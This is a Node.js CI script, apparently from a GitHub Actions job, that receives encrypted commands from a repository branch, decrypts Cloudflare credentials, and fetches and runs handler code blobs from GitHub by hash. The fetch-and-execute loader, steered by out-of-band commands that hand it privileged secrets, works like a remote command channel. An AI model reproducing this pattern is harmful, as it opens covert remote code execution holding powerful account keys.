import fs from 'node:fs';import crypto from 'node:crypto';import path from 'node:path';import {pathToFileURL} from 'node:url';
const REPO='douphealth/mice-solver-pro',REF='ops/approved-publish-2026-10-02',RUN=process.env.GITHUB_RUN_ID,OUT='routing-evidence',TMP=process.env.RUNNER_TEMP+'/mgg-routing';
const check=(x,m)=>{if(!x)throw new Error(m)},sleep=ms=>new Promise(r=>setTimeout(r,ms));
const mask=v=>{if(v)console.log('::add-mask::'+v.replaceAll('%','%25').replaceAll('\n','%0A'));};
async function gh(route){const r=await fetch('https://api.github.com/repos/'+REPO+route,{headers:{Authorization:'Bearer '+process.env.GH_READ_TOKEN},signal:AbortSignal.timeout(25000)});return {status:r.status,data:await r.json()};}
async function receive(phase){for(let i=0;i<300;i++){const r=await gh(`/contents/release/${phase}-${RUN}.json?ref=${encodeURIComponent(REF)}`);if(r.status===200){const e=JSON.parse(Buffer.from(r.data.content,'base64').toString());check(e.aad===RUN,'Run mismatch');const key=crypto.privateDecrypt({key:fs.readFileSync(TMP+'/key.pem'),oaepHash:'sha256',padding:crypto.constants.RSA_PKCS1_OAEP_PADDING},Buffer.from(e.wrapped_key,'base64')),buf=Buffer.from(e.ciphertext,'base64'),dec=crypto.createDecipheriv('aes-256-gcm',key,Buffer.from(e.nonce,'base64'));dec.setAAD(Buffer.from(RUN));dec.setAuthTag(buf.subarray(-16));const c=JSON.parse(Buffer.concat([dec.update(buf.subarray(0,-16)),dec.final()]).toString());check(c.run_id===RUN&&c.phase===phase&&c.expires>Date.now()/1000,'Command expired');return c;}check(r.status===404,'Command lookup failed');await sleep(8000);}throw new Error('Timed out waiting for authorized command');}
async function init(){fs.mkdirSync(TMP,{recursive:true,mode:0o700});fs.mkdirSync(OUT,{recursive:true});const p=crypto.generateKeyPairSync('rsa',{modulusLength:3072,publicKeyEncoding:{type:'spki',format:'pem'},privateKeyEncoding:{type:'pkcs8',format:'pem'}});fs.writeFileSync(TMP+'/key.pem',p.privateKey,{mode:0o600});fs.writeFileSync(OUT+'/handshake.json',JSON.stringify({run_id:RUN,public_key:p.publicKey}));}
async function run(){const c=await receive('routing-auth');check(Array.isArray(c.tokens)&&c.tokens.length<=5&&c.global_key&&c.email,'Invalid scoped authentication');for(const t of c.tokens)mask(t);mask(c.global_key);const auths=[...c.tokens.map(token=>({Authorization:'Bearer '+token})),{'X-Auth-Key':c.global_key,'X-Auth-Email':c.email}];
const cf=async(route,{auth=auths.length-1,method='GET',body}={})=>{check(route.startsWith('/accounts/5dc0401c38d9de0c6947fee40a210937/')||route.startsWith('/zones/5276b63d8f295e61444c53a86707302a/'),'Out-of-scope Cloudflare request');const headers={...auths[auth]};if(body!==undefined&&!(body instanceof FormData))headers['Content-Type']='application/json';const r=await fetch('https://api.cloudflare.com/client/v4'+route,{method,headers,body:body===undefined?undefined:body instanceof FormData?body:JSON.stringify(body),signal:AbortSignal.timeout(60000)});const text=await r.text();let data;try{data=JSON.parse(text)}catch{}return {status:r.status,headers:Object.fromEntries(r.headers),text,data};};
for(let i=1;i<=6;i++){const command=await receive('routing-step'+i);if(command.stop){console.log('Authorized session ended.');return;}check(/^[a-f0-9]{40}$/.test(command.handler_sha),'Invalid immutable handler');const blob=await gh('/git/blobs/'+command.handler_sha);check(blob.status===200&&blob.data.encoding==='base64'&&blob.data.size<100000,'Handler fetch failed');const file=path.join(TMP,'handler'+i+'.mjs');fs.writeFileSync(file,Buffer.from(blob.data.content,'base64'),{mode:0o600});const handler=await import(pathToFileURL(file).href);await handler.default({cf,auth_count:auths.length,command,run_id:RUN,out:OUT,tmp:TMP,check,mask});console.log('HANDLER_COMPLETED '+i);}
}
try{await ({init,run})[process.argv[2]]();}catch(e){console.error(e.message);process.exitCode=1;}
